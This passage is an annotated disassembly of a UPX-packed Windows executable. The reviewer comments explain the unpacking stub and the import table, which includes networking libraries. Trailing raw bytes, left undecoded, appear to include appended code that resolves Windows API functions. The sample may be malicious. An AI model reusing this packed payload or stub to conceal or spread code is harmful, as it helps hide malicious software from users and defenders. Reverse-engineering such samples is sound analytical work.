70A40A19h, 45A1816Fh, 4E326578h, 7C52FFF6h dd 6C6F6F54h, 32337067h, 70616E53h, 746F6873h, 4DADDD19h dd 32129C8Ah, 540F7372h, 14AD7305h, 182C358Fh, 80FB05B6h dd 78654E21h, 41616974h, 215FFD54h, 0F76451Eh, 7469616Bh dd 53726F46h, 0B6F6BA21h, 4F7B673Ch, 2C766A62h, 0D9B9E144h dd 8D225AC3h, 3A0B6972h, 0BFBDEC97h, 486573C8h, 0C646E61h dd 0C25E2447h, 8B6C3BDh, 5A61D26Eh, 0B5CDB3F0h, 0A3449711h dd 14796456h, 0B6DF75BBh, 2B61984Ch, 6F666E49h, 6509530Fh dd 37800670h, 9C496218h, 64656B26h, 64D98845h, 6EB328B3h dd 92E7FB36h, 12E0D0CDh, 6464410Bh, 0F7B30F72h, 4C0B111Dh dd 61726269h, 0E68AB567h, 4D2B60DAh, 36137C82h, 0D5CB080Bh dd 0C363CF8Eh, 547B42DAh, 75888169h, 4915DE65h, 0E94D8AD8h dd 1BDA3478h, 0DD29B36h, 0F239C45Dh, 4F116610h, 78455A62h dd 0B3612DB6h, 630ADF31h, 9B9E6D13h, 522DC6E0h, 87B591Bh dd 1766C0E0h, 38657A86h, 0A3604CA7h, 451585B5h, 0D160C3FCh dd 33759F9Dh, 0A1673A2Bh, 4579654Bh, 0CE40EC3Bh, 0FC18610h dd 5EC00A51h, 11F65AC2h, 5987309Eh, 21E7426Ch, 841CE010h dd 0C517B76h, 0BE6E6241h, 0E2B6853h, 310428A5h, 1AC13F86h dd 3677D985h, 62BB1089h, 440A7DB6h, 720E6112h, 0D61B6669h dd 0CA79B63Ah, 2B758F67h, 616F6C36h, 6FCE436Fh, 6F112C79h dd 67702350h, 0E8F5210h, 38F63F90h, 4114B4D0h, 69757163h dd 74AE7072h, 35494DD8h, 0C3363AA0h, 0DE1359A7h, 
0CA7273ECh
; (the value above closes the dd row that began on the previous line)
; Tail of the packed payload stored in UPX1; the unpacking stub below reads it
; as a bit stream starting at dword_31426000.
                dd 18B16D06h, 35B2D1CEh, 150F920Eh, 536B99DAh, 445F1D4Dh
                dd 740AC558h, 685F3FB8h, 3627F9F6h, 2CC46DBh, 4F727907h
                dd 880110E9h, 9160AD15h, 1CC2D22h, 271DCD34h, 61150E65h
                dd 14362CC2h, 0BBB4E70Ah, 4906EE15h, 70737766h, 4166B105h
                dd 9C62834Fh, 424F466h, 0DB616C5Ah, 9B558543h, 370E1141h
                dd 6705212Ch, 1B866B14h, 6E0306A6h, 74534349h, 8C950E81h
                dd 0D471A65h, 0A8EDB2CBh, 273FFA1h, 2C010D02h, 392CB2CBh
                dd 0C17346Fh, 0B2CB2CB2h, 10130409h, 4F45AA16h, 455036AAh
                dd 0E4FFB60Eh, 59C896B7h, 0E00040D8h, 0B010F00h, 260C0601h
                dd 68011CB2h, 2334DC12h, 0C6A32510h, 0B31420Eh, 0B7334A02h
                dd 0C079BA4h, 39341E60h, 10B0364Bh, 2D570607h, 6210805Dh
                dd 7C64098Ch, 0B0AE3145h, 6A2E1E01h, 0B60D8180h, 269024A6h
                dd 7C7B64C4h, 0E0049F90h, 0FBE1642Eh, 0D85BA114h, 272A0737h
                dd 48C016h, 81434BE0h, 54C32Fh, 2 dup(0)
                db 90h
                db 0FFh, 2 dup(0)
                align 10h

; ---------------------------------------------------------------------------
; Unpacking stub (runs from 31427BB0h to the jmp at loc_31427D07).
;
; Three phases, in order:
;   1. Decompress the bit stream at dword_31426000 into memory starting at
;      esi-5000h (= 31421000h, the start of segment UPX0 per the listing header).
;   2. Restore the operands of E8/E9 (call/jmp rel32) instructions that were
;      transformed before packing (loc_31427C82 .. loop).
;   3. Rebuild the import table: load each DLL, resolve each import, write the
;      address into its IAT slot (loc_31427CBC .. loc_31427D01).
; It then restores the registers and jumps to loc_31422334 inside UPX0.
;
; Register roles during phase 1:
;   esi = read pointer into the packed stream
;   edi = write pointer into the unpacked image
;   ebx = bit buffer (32 bits at a time, with a marker bit - see loc_31427BD2)
;   ebp = offset of the most recent match, kept as a negative number (starts at -1)
;   eax = offset being decoded, ecx = match length, edx = match source pointer
;
; NOTE(review): the stream layout (literal flag, variable-length offset and
; length codes, 32-bit refill with a marker bit) looks like UPX's NRV2B
; decoder; the segment names UPX0/UPX1/UPX2 fit, but confirm the exact variant
; against the UPX stub sources before relying on the name.
; The stub performs no bounds checks on esi/edi; it trusts the packed stream.
; ---------------------------------------------------------------------------
                pusha                           ; save all registers; restored by popa at loc_31427D07
                mov     esi, offset dword_31426000 ; esi -> start of packed stream
                lea     edi, [esi-5000h]        ; edi -> 31421000h, destination of the unpacked image
                push    edi                     ; keep the image start; popped into esi at loc_31427C82
                or      ebp, 0FFFFFFFFh         ; last match offset = -1
                jmp     short loc_31427BD2      ; load the first 32 bits of the bit buffer
; ---------------------------------------------------------------------------
                align 8

; Literal: copy one byte from the stream to the output.
loc_31427BC8:                           ; CODE XREF: UPX1:loc_31427BD9j
                mov     al, [esi]
                inc     esi
                mov     [edi], al
                inc     edi

; Main decode loop: fetch the next control bit into CF.
loc_31427BCE:                           ; CODE XREF: UPX1:31427C66j
                                        ; UPX1:31427C7Dj
                add     ebx, ebx                ; shift next bit into CF
                jnz     short loc_31427BD9      ; ebx != 0: CF holds a data bit
                                                ; ebx == 0: only the marker bit was left, refill

; Bit-buffer refill. The same three instructions recur throughout phase 1.
loc_31427BD2:                           ; CODE XREF: UPX1:31427BC0j
                mov     ebx, [esi]              ; next 32 bits of the stream
                sub     esi, 0FFFFFFFCh         ; esi += 4, written as "- (-4)" so CF comes out set
                                                ; (for any esi below 0FFFFFFFCh)
                adc     ebx, ebx                ; top data bit -> CF, CF(=1) -> bit 0 as end marker

loc_31427BD9:                           ; CODE XREF: UPX1:31427BD0j
                jb      short loc_31427BC8      ; control bit 1 -> literal byte
                mov     eax, 1                  ; control bit 0 -> match; start decoding its offset

; Variable-length offset code: alternately read a value bit (appended to eax)
; and a flag bit (0 = another pair follows, 1 = done).
loc_31427BE0:                           ; CODE XREF: UPX1:31427BEFj
                                        ; UPX1:31427BFAj
                add     ebx, ebx
                jnz     short loc_31427BEB
                mov     ebx, [esi]              ; refill (see loc_31427BD2)
                sub     esi, 0FFFFFFFCh
                adc     ebx, ebx

loc_31427BEB:                           ; CODE XREF: UPX1:31427BE2j
                adc     eax, eax                ; eax = eax*2 + value bit
                add     ebx, ebx                ; flag bit -> CF
                jnb     short loc_31427BE0      ; flag 0: keep reading
                jnz     short loc_31427BFC      ; flag 1 and buffer not empty: offset code complete
                mov     ebx, [esi]              ; buffer was empty: refill, the real flag bit is now in CF
                sub     esi, 0FFFFFFFCh
                adc     ebx, ebx
                jnb     short loc_31427BE0

loc_31427BFC:                           ; CODE XREF: UPX1:31427BF1j
                xor     ecx, ecx                ; length accumulator = 0
                sub     eax, 3
                jb      short loc_31427C10      ; code value 2: reuse the previous offset in ebp
                shl     eax, 8
                mov     al, [esi]               ; low 8 bits of the offset come from a whole stream byte
                inc     esi
                xor     eax, 0FFFFFFFFh         ; eax = ~eax: offsets are kept negative
                jz      short loc_31427C82      ; all-ones offset field = end of stream
                mov     ebp, eax                ; remember as the current match offset

; Match length: first two bits, read into ecx.
loc_31427C10:                           ; CODE XREF: UPX1:31427C01j
                add     ebx, ebx
                jnz     short loc_31427C1B
                mov     ebx, [esi]              ; refill
                sub     esi, 0FFFFFFFCh
                adc     ebx, ebx

loc_31427C1B:                           ; CODE XREF: UPX1:31427C12j
                adc     ecx, ecx
                add     ebx, ebx
                jnz     short loc_31427C28
                mov     ebx, [esi]              ; refill
                sub     esi, 0FFFFFFFCh
                adc     ebx, ebx

loc_31427C28:                           ; CODE XREF: UPX1:31427C1Fj
                adc     ecx, ecx
                jnz     short loc_31427C4C      ; non-zero two-bit length: use it directly
                inc     ecx                     ; both bits 0: longer length, same value/flag code as the offset

loc_31427C2D:                           ; CODE XREF: UPX1:31427C3Cj
                                        ; UPX1:31427C47j
                add     ebx, ebx
                jnz     short loc_31427C38
                mov     ebx, [esi]              ; refill
                sub     esi, 0FFFFFFFCh
                adc     ebx, ebx

loc_31427C38:                           ; CODE XREF: UPX1:31427C2Fj
                adc     ecx, ecx                ; ecx = ecx*2 + value bit
                add     ebx, ebx                ; flag bit
                jnb     short loc_31427C2D
                jnz     short loc_31427C49
                mov     ebx, [esi]              ; refill, then re-test the flag bit
                sub     esi, 0FFFFFFFCh
                adc     ebx, ebx
                jnb     short loc_31427C2D

loc_31427C49:                           ; CODE XREF: UPX1:31427C3Ej
                add     ecx, 2

; Copy the match: ecx bytes from edi+ebp (earlier output) to edi.
loc_31427C4C:                           ; CODE XREF: UPX1:31427C2Aj
                cmp     ebp, 0FFFFF300h         ; CF = 1 when the match lies more than 0D00h bytes back
                adc     ecx, 1                  ; length += 1, plus 1 more for such distant matches
                lea     edx, [edi+ebp]          ; edx -> match source in already-written output
                cmp     ebp, 0FFFFFFFCh
                jbe     short loc_31427C6C      ; distance >= 4: dword copy cannot overtake itself

; Distance 1..3: source and destination overlap, so copy byte by byte.
loc_31427C5D:                           ; CODE XREF: UPX1:31427C64j
                mov     al, [edx]
                inc     edx
                mov     [edi], al
                inc     edi
                dec     ecx
                jnz     short loc_31427C5D
                jmp     loc_31427BCE
; ---------------------------------------------------------------------------
                align 4

; Distance >= 4: copy four bytes per iteration.
loc_31427C6C:                           ; CODE XREF: UPX1:31427C5Bj
                                        ; UPX1:31427C79j
                mov     eax, [edx]
                add     edx, 4
                mov     [edi], eax
                add     edi, 4
                sub     ecx, 4
                ja      short loc_31427C6C
                add     edi, ecx                ; ecx is now <= 0: step edi back over any bytes copied past the length
                jmp     loc_31427BCE
; ---------------------------------------------------------------------------

; Phase 2: restore call/jmp operands in the unpacked image.
; Scans for opcode E8 or E9 whose operand starts with the tag byte 01, and
; rewrites that operand; stops after 7Eh (126) rewrites.
loc_31427C82:                           ; CODE XREF: UPX1:31427C0Cj
                pop     esi                     ; esi = start of unpacked image (the edi pushed at entry)
                mov     edi, esi                ; scan from the start of the image
                mov     ecx, 7Eh                ; number of operands to restore

loc_31427C8A:                           ; CODE XREF: UPX1:31427C91j
                                        ; UPX1:31427C96j
                mov     al, [edi]
                inc     edi
                sub     al, 0E8h                ; al = 0 for E8 (call rel32), 1 for E9 (jmp rel32)

loc_31427C8F:                           ; CODE XREF: UPX1:31427CB4j
                cmp     al, 1
                ja      short loc_31427C8A      ; neither E8 nor E9: keep scanning
                cmp     byte ptr [edi], 1
                jnz     short loc_31427C8A      ; operand not tagged with 01: it was not transformed
                mov     eax, [edi]              ; bytes: 01, b1, b2, b3
                mov     bl, [edi+4]             ; pre-load the byte after the operand
                shr     ax, 8                   ; drop the tag; al = b1
                rol     eax, 10h                ; these three steps leave eax = 00:b1:b2:b3,
                xchg    al, ah                  ; i.e. the 24-bit value that was stored big-endian
                sub     eax, edi                ; eax = value - (operand address - image start):
                sub     bl, 0E8h                ;   (bl prepared like al above for the next test)
                add     eax, esi                ;   back to a displacement relative to this operand
                mov     [edi], eax              ; write the restored rel32
                add     edi, 5                  ; skip the 4 operand bytes and the byte already in bl
                mov     eax, ebx                ; al = next byte - 0E8h, tested at loc_31427C8F
                loop    loc_31427C8F

; Phase 3: import resolution.
; edi walks a compact import list at esi+5000h. Per DLL: a dword offset of the
; DLL name (0 ends the list) and a dword offset of the first IAT slot, followed
; by tagged entries for each import and a 0 byte terminator.
                lea     edi, [esi+5000h]

loc_31427CBC:                           ; CODE XREF: UPX1:31427CDEj
                mov     eax, [edi]              ; offset of DLL name, relative to esi+7000h
                or      eax, eax
                jz      short loc_31427D07      ; 0 = no more DLLs
                mov     ebx, [edi+4]
                lea     eax, [eax+esi+7000h]    ; eax -> DLL name string (31428000h + offset, segment UPX2)
                add     ebx, esi                ; ebx -> first IAT slot to fill for this DLL
                push    eax
                add     edi, 8
                call    dword ptr [esi+708Ch]   ; = dword_3142808C, annotated by IDA as KERNEL32.LoadLibraryA
                xchg    eax, ebp                ; ebp = returned module handle (not checked for failure here;
                                                ; a null handle would surface at the lookup below)

loc_31427CD9:                           ; CODE XREF: UPX1:31427CFFj
                mov     al, [edi]               ; entry tag
                inc     edi
                or      al, al
                jz      short loc_31427CBC      ; 0 = end of this DLL's imports
                mov     ecx, edi                ; large count for the scasb in the by-name path
                ; Tag with bit 7 clear: import by name. The jump lands ONE BYTE INTO the
                ; mov at loc_31427CEA, whose immediate bytes 57 48 F2 AE decode as
                ;     push edi / dec eax / repne scasb
                ; i.e. push the name pointer and advance edi past the name's terminator.
                ; (Assumes the tag is 01 so that dec eax leaves al = 0 - TODO confirm.)
                ; Linear disassembly does not show this path; IDA marks it as "+1".
                jns     short near ptr loc_31427CEA+1
                ; Tag with bit 7 set: import by ordinal.
                movzx   eax, word ptr [edi]     ; 16-bit ordinal
                inc     edi
                push    eax                     ; ordinal passed in place of a name pointer
                inc     edi

loc_31427CEA:                           ; CODE XREF: UPX1:31427CE2j
                mov     ecx, 0AEF24857h         ; by-ordinal path: executed as shown, ecx value unused afterwards
                push    ebp                     ; module handle
                call    dword ptr [esi+7090h]   ; second KERNEL32 slot (31428090h); presumably GetProcAddress,
                                                ; going by the name order in the UPX2 table - verify
                or      eax, eax
                jz      short loc_31427D01      ; lookup failed
                mov     [ebx], eax              ; store resolved address in the IAT
                add     ebx, 4
                jmp     short loc_31427CD9
; ---------------------------------------------------------------------------

loc_31427D01:                           ; CODE XREF: UPX1:31427CF8j
                call    dword ptr [esi+7094h]   ; third KERNEL32 slot (31428094h); presumably ExitProcess - verify

loc_31427D07:                           ; CODE XREF: UPX1:31427CC0j
                popa                            ; restore the registers saved at entry
                jmp     loc_31422334            ; hand control to the unpacked code in UPX0
                                                ; (presumably the original entry point). The popa + far jmp
                                                ; pair marks where unpacking is complete.
; ---------------------------------------------------------------------------
                align 400h
UPX1            ends

; Section 3. (virtual address 00008000)
; Virtual size : 0001C000 ( 114688.)
; Section size in file : 0001C000 ( 114688.)
; Offset to raw data for section: 00008000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; NOTE(review): like UPX0 in the listing header, this section is mapped
; readable, writable and executable at the same time.
; ===========================================================================

; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2            segment para public 'CODE' use32
                assume cs:UPX2
                ;org 31428000h
                assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
; Import directory used by the loader for the stub itself. Read as five-dword
; descriptors whose last two fields are (DLL name offset, IAT offset); the
; first three fields are zero in every entry.
                dd 3 dup(0)
                dd 80C4h, 808Ch, 3 dup(0)       ; name at +80C4h, IAT at +808Ch
                dd 80D1h, 809Ch, 3 dup(0)
                dd 80DEh, 80A4h, 3 dup(0)
                dd 80E9h, 80ACh, 3 dup(0)
                dd 80F4h, 80B4h, 3 dup(0)
                dd 8100h, 80BCh, 5 dup(0)       ; last descriptor, then the all-zero terminator
; IAT slots. The values are addresses as resolved in the image this listing was
; produced from. The stub calls the first three through [esi+708Ch],
; [esi+7090h] and [esi+7094h].
dword_3142808C  dd 7C801D77h            ; resolved to->KERNEL32.LoadLibraryA
                                        ; sub_31432C1B+49r
                dd 7C80ADA0h, 7C81CDDAh, 0      ; slots 31428090h and 31428094h, then end of the KERNEL32 list
                dd 77DD6BF0h, 0                 ; same value the listing header resolves to ADVAPI32.RegCloseKey
                dd 77C371D3h, 0
                dd 7E41A8ADh, 0
                dd 42C2C8A1h, 0
                dd 71AB9639h, 0
; Name strings, shown by IDA as little-endian dwords. Decoded as ASCII they read:
; "KERNEL32.DLL", "ADVAPI32.dll", "MSVCRT.dll", "USER32.dll", "WININET.dll",
; "WS2_32.dll", then "LoadLibraryA", "GetProcAddress", "ExitProcess",
; "RegCloseKey", "rand", "wsprintfA", "InternetOpenA".
                dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
                dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
                dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
                dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
                dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
                dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
                dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
                dd 6E65704Fh, 41h, 26h dup(0)
; NOTE(review): the dwords from here on follow the import data; IDA left them
; as raw data and this listing does not establish what they contain.
                dd 1C39068h, 0FFC48BEDh, 0E85B93D0h, 59h, 824648Bh, 4EBB8h
                dd
64FAEB00h, 18A167h, 0F30408Bh, 830240B6h, 3C7500F8h dd 0E8h, 0ED815D00h, 402334h, 237B858Bh, 85030040h, 402383h dd 858BF08Bh, 40237Fh, 23838503h, 8B500040h, 0ACC933FEh dd 238B8532h, 41AA0040h, 23878D3Bh, 0EF7C0040h, 64C02BC3h dd 896430FFh, 5678B820h, 3871234h, 6000h, 7BB0h, 31420000h dd 1E00h, 0E89078h, 8B000000h, 80F72404h, 242Bh, 80000000h dd 29AC9889h, 5C8B0000h, 2D740424h, 0B08959FCh, 29B0h dd 29B4B889h, 0B8800000h, 242Fh, 30D75E8h, 243098h, 25B8B00h dd 8EB33FFh, 2431988Bh, 33FF0000h, 8195555Bh, 8F04246Ch dd 81000000h, 0FFF000E3h, 6ED81FFh, 8B004010h, 8D04247Ch dd 40343CB5h, 2BB900h, 0A4F30000h, 544E7B81h, 75736968h dd 3C438B0Dh, 6618048Dh, 45503881h, 0EB810874h, 100h, 508BE275h dd 8BD30378h, 4A8B2072h, 51F30318h, 81C303ADh, 4700FF78h dd 1B757465h, 50037881h, 75636F72h, 7788112h, 72646441h dd 78810975h, 7373650Bh, 0E2057400h, 0C35D59D7h, 8B240C29h dd 3592472h, 4B70FF3h, 1C7A8B4Eh, 348BFB03h, 0E8F30387h dd 0Ch, 736F6C43h, 6E614865h, 656C64h, 89D6FF53h, 40353C85h dd 0DE800h, 72430000h, 65746165h, 6E657645h, 53004174h dd 8589D6FFh, 403540h, 0DE8h, 74654700h, 7473614Ch, 6F727245h dd 0FF530072h, 448589D6h, 0E8004035h, 70h, 2174C085h, 4495FF50h dd 85004035h, 8D1075C0h, 4011D285h, 0FF508A00h, 6EE8h dd 0FF7CEB00h, 40353C95h, 3185F700h, 4034h, 74800000h dd 35B58D1Eh, 8B004034h, 0A404247Ch, 0B29D8BA5h, 8B004039h dd 4039B6B5h, 0BABD8B00h, 5D004039h, 6A5AC3h, 6A006Ah dd 168006Ah, 8B000400h, 50006AC4h, 0C48B0C6Ah, 5456E2FFh dd 335Fh, 0DAE8C933h, 8DFFFFFFh, 4011A195h, 51515200h dd 4095FF50h, 83004035h, 8AC320C4h, 225FB9F2h, 10300000h dd 0E2D60240h, 0B88C3F9h, 0E83518B5h, 6DC3B830h, 0E820CDD4h dd 80257B70h, 28A05885h, 7CF1BD3Bh, 0A1D35890h, 0A8B1799Ah dd 915E1D9Fh, 1A73B870h, 7A6F3081h, 0B6238B2h, 11DE8D91h dd 0A62238F0h, 6B659E87h, 890038E3h, 9D682D99h, 7DCDB870h dd 0E820CDEBh, 0B50D3143h, 28E02DC8h, 16282601h, 37E058D3h dd 0BD94ED0Fh, 40E19850h, 1CC4B72Fh, 6360D850h, 48EAEC37h dd 28C8DB93h, 0C1C838A0h, 28D50855h, 0E1CE10F0h, 0A84A9810h dd 0FD882DCFh, 28E5D810h, 0F6717C7Fh, 
0A537E76Fh, 8D03805h dd 0D10FD3D0h, 88007284h, 0B8207591h, 5DCDB870h, 0E820CAD3h dd 0EA7F5D83h, 0A380F413h, 7BC8524Ch, 0FD6D0110h, 884062CDh dd 54AB33E3h, 3650EFB9h, 8037C417h, 881F873h, 1DF08D6Fh dd 8C4338F0h, 6720DDF0h, 77FEDA74h, 0A84A0FEFh, 0C828B95Ah dd 80E0D854h, 881F870h, 1DF08D6Fh, 884538F0h, 9665DCDFh dd 886A870Fh, 0A820F040h, 0C82AB834h, 0BF6C3091h, 60D0F91Ah dd 28A11891h, 7D90AD4Fh, 62885890h, 770079F0h, 0E815C885h dd 0C8455030h, 0BC89D850h, 627F078Eh, 22434190h, 0DD3F32DAh dd 68A06D6Ch, 0BC3891Bh, 0E815E8ADh, 4C4FB830h, 179F2667h dd 880FE98h, 6CF45690h, 0B7C074FCh, 28D5D045h, 0FBB5F5F0h dd 9B20D807h, 18FD35F9h, 59609865h, 4E686B7Bh, 0ABA01892h dd 8F5C00Dh, 0ECEF58D0h, 77FF86F3h, 9DF41D9Bh, 0B8BFB870h dd 7DE55751h, 8380B843h, 6895F015h, 49B0C7B0h, 5B02DD5Fh dd 0D8B78B0h, 0A860ADC8h, 4741C8CFh, 0A85331D5h, 0D40D7370h dd 0CBA058A5h, 49B1C7B9h, 5B16DD5Fh, 7AE878B0h, 25DF67EDh dd 8876F68Dh, 82AF5350h, 0F7590E70h, 0C9231CE0h, 4B8052B3h dd 688A0F29h, 3D8D609Ah, 0A8608D8Fh, 0C840A489h, 65B45350h dd 0F77EB574h, 83C6E76Fh, 488D3C3Dh, 0EE058D0h, 8C47F55Bh dd 4C4AABBh, 33A21356h, 2608D83Ah, 8380F819h, 0A3A0725Ch dd 20C05274h, 60E058D0h, 0DA51389Ah, 5770967Ah, 887558A5h dd 2CE38050h, 614E9030h, 0FC2B1890h, 844B38DAh, 688A18BAh dd 0E2527A9Ah, 0C1EEF010h, 0C82AB830h, 0B89FB201h, 3D646D8Fh dd 71FF18D0h, 0CCCFC735h, 971FA5F7h, 9800CD7Dh, 0DC999850h dd 4340B83Ah, 69C52BBFh, 4890F89Dh, 64259590h, 0B7C078A4h dd 8875D530h, 0DA0038E8h, 9DBC0DEFh, 0DEA8B870h, 0A460D850h dd 7DEB971Fh, 41D248E0h, 2DAC51C6h, 9B63DB7h, 0C9650D9Ch dd 3DDFC810h, 0C8008D78h, 0DD2C5DD9h, 5CD0F830h, 0D7CA38FAh dd 7D2CAD4Fh, 0A8655890h, 1E3F0DAFh, 0FE769A7Ah, 0C92A6CBBh dd 0E8713002h, 6DD3F870h, 5DC27DD4h, 21B268D7h, 0D8C31A6h dd 0DE001D97h, 9D6C0DEFh, 0CCBB870h, 0B8368E06h, 9D7FAF26h dd 28E02D40h, 1FD0FC33h, 5DDCCD2Fh, 886A78B0h, 3DDF9A7Ah dd 0C8008D40h, 0E861F0E9h, 0E9AB6F70h, 7C841419h, 0E455C7E7h dd 5BE018E5h, 0B4A5FB06h, 0A820D826h, 5DBFEF64h, 0E820EDE0h dd 54F438F5h, 2C5E9BD6h, 3C3FD6C2h, 
688A50F4h, 1DFF529Ah dd 0A860ADB8h, 143478B5h, 0EC5D30C3h, 0C1B3F870h, 1190FB01h dd 8F60435h, 0E9C82DD0h, 880DD631h, 0F874C810h, 9810E966h dd 80F52703h, 8D80B845h, 27D44150h, 40E44C4Fh, 5EDCDD5Fh dd 24E878B0h, 0FBDF67EDh, 0FD7C2DCFh, 708BD810h, 9A83CF1h dd 0D7F71890h, 8F50425h, 9305B1D0h, 0C18D870Fh, 0F078C010h dd 0C8697630h, 0E86DBD50h, 880F970h, 28A01890h, 48C038B0h dd 3BB609D0h, 0BD48ED0Fh, 0F18B9850h, 0BD803C9Ch, 2B8E3AABh dd 7BE1BA2Ch, 45C156F5h, 2A8F5CD5h, 1C833DBAh, 0BB572483h dd 0C176C722h, 0C835CC42h, 9A14AB3Ch, 8EE9D1Ch, 49C56AD3h dd 21865DC4h, 68A13DBCh, 0E9650AB3h, 0C166FD64h, 0A90DDD5Ch dd 8609A820h, 4B80B917h, 5CC17DE2h, 27B268D5h, 1B933DB3h dd 0FA4378B1h, 0CD54F975h, 0A72DDD62h, 8034BD24h, 6CE19D02h dd 4DD25B90h, 1CA54CD1h, 9852AB8h, 0FA437894h, 0CD54F975h dd 0A42FD764h, 980CBD38h, 66D3CA43h, 40D368F1h, 0DC04CDFh dd 3C9431A8h, 0E9650A98h, 0C1669874h, 0A114DD5Ch, 8734BD3Dh dd 7CF38123h, 41F475F5h, 0FC05DDDh, 1A62CB5h, 0FC411D9Ch dd 0CA49EA64h, 0BB25CC45h, 8D27D811h, 64E9BE04h, 52C94BF5h dd 2D8738D5h, 4891EA4h, 0E5692C95h, 0CD679875h, 0AC2FF544h dd 0A005B425h, 64E49611h, 6FA059F5h, 2D944CD5h, 1A628BDh dd 0E94E1D9Ch, 0A861FD7Dh, 9C34DD77h, 0B810B535h, 49E88C11h dd 5CC55F90h, 3BB25DE6h, 688E37B9h, 0DE741DB7h, 0C153EA75h dd 0B005D65Fh, 872CD811h, 61CC9C11h, 5AC16AF2h, 5C079C9h dd 1B628B1h, 0EE4F0F95h, 0CD4CF156h, 0AD30F730h, 84099E3Eh dd 78E1B515h, 4FCE71E0h, 388F38F1h, 1AB036B5h, 0FB651B9Fh dd 0DA709863h, 0BB25DB5Fh, 0AE52EB23h, 7CF38A19h, 47D24890h dd 3BB35DD3h, 0DAE6AE3h, 0DB000C88h, 0C166EC75h, 0BC01DD5Ch dd 8A09AA24h, 7BE58C05h, 4DF318D1h, 24A97EC4h, 5890CB5h dd 0E4537895h, 0A850FD75h, 0BC33C163h, 8134B535h, 67D49D1Dh dd 4DCC71D6h, 2DAD51E4h, 58E0DD0h, 0E1560891h, 0CE6FEF75h dd 0AD2CD176h, 9A098E50h, 64E18D04h, 47CC74D1h, 3A9738D3h dd 2E852CB9h, 88651499h, 0CC61EC5Eh dd 0BC33CD5Ah, 9E09AA00h, 6FE59419h, 47F46BF5h, 48AE5DDBh dd 1AA32C9Eh, 0ED741995h, 0CD4CF156h, 8B34F630h, 9C01BD22h dd 67F2A815h, 5BD37DF3h, 0BB476B0h, 1C813DA2h, 0E7722895h dd 
0DB53FD73h, 8640C075h, 8D129B24h, 5BE58C11h, 41D47BF5h dd 6C056DFh, 188115A4h, 0FF6511A6h, 0CD73FE5Fh, 0A729CC53h dd 9C2ED83Eh, 66E5883Fh, 4DCC71D6h, 7B476B0h, 388E3DA0h dd 0ED631782h, 0C774EB63h, 0C82EDD5Bh, 9A30AC1Eh, 6BE58C1Fh dd 5AC94EE4h, 24A14DC4h, 78D3D9Dh, 0C6000182h, 0C152CF64h dd 0A116DD44h, 8915AC22h, 65E5B51Ch, 28D96AFFh, 1DAC4CE2h dd 78331BEh, 0FC531D94h, 0CF4EF162h, 0A601D764h, 9C33B123h dd 6FEE9102h, 69F34F90h, 3AA14CE3h, 68902DA4h, 0FB6F1493h dd 0CB4FEB75h, 0C834DD5Bh, 860EB733h, 8F49B15h, 40D47DF7h dd 2AB44BDFh, 58136A9h, 0ED727895h, 0DB20EE73h, 0C824D655h dd 8303B723h, 41808C15h, 5AC56CFEh, 0BB45DDEh, 0D9337BCh dd 0EC6E19B8h, 0E120FD7Ch, 0BA25CC5Eh, 0AF14BD3Eh, 67C38C15h dd 4BC576FEh, 1BA45DC4h, 0D9439A4h, 0FC6E31F0h, 0CD4EEA75h dd 0AD30F744h, 0A160993Eh, 7AE58C1Eh, 67D47DFEh, 1DAE5DC0h dd 68A134A2h, 0ED7416B9h, 0DC45F662h, 0AC21DD62h, 8D0CB116h dd 5EC4B970h, 1BE948D1h, 4841682h, 0DB2589Ch, 0E76C3B97h dd 0CD6BFD63h, 0AD12B849h, 8D109737h, 71E5B31Eh, 28E160D5h dd 19A75DE2h, 11923DA5h, 0FD6C19A6h, 0E958DD75h, 0AF25EA30h dd 0BE14BD03h, 6DF59411h, 28E160D5h, 63C5D133h, 68880918h dd 5E878F0h, 0C223BC5Ch, 9945D230h, 0ED0A8B00h, 83D034FBh dd 42F44844h, 1B9269F0h, 5D10CD2Fh, 4C8378B0h, 5CB5671Ch dd 4B40F805h, 0BFA3D094h, 1D317DFDh, 0D79318D0h, 22C052E0h dd 0CC75A7DEh, 0D0038C5h, 38A497D0h, 9840B830h, 0E8091638h dd 62547370h, 426C9390h, 48C050F0h, 6A8A58C0h, 0E00012A2h dd 0A820F1DEh, 9B11B85Ah, 0CF52700h, 5780B845h, 1435E7C9h dd 0CDC07885h, 0E3BC2C2Fh, 0C815F07Dh, 252C7B10h, 8850B8A5h dd 0BFB1DB50h, 83520723h, 6895CC15h, 0DC4FB5B0h, 80E058F3h dd 77FF87A4h, 9DC81D9Bh, 47CDB870h, 0E860FBB1h, 0F77FBB98h dd 0F025936Fh, 0C5C07885h, 68C3B05Fh, 773290F0h, 2DAB67EFh dd 0C8008DECh, 0E31418D5h, 2B7577FDh, 35481890h, 0C33FC74Fh dd 3D230717h, 88007818h, 45A1C510h, 0C800A224h, 6DED1163h dd 8C0E5DEh, 79F14CC1h, 0B79169E0h, 28D53445h, 0AC04FFF0h dd 9D1C0DEFh, 0A1DB870h, 35D854h, 880F870h, 6B4D99CDh dd 22C078AAh, 6675D52Fh, 0D80038EAh, 8C005542h, 4B409230h dd 2F06D494h, 
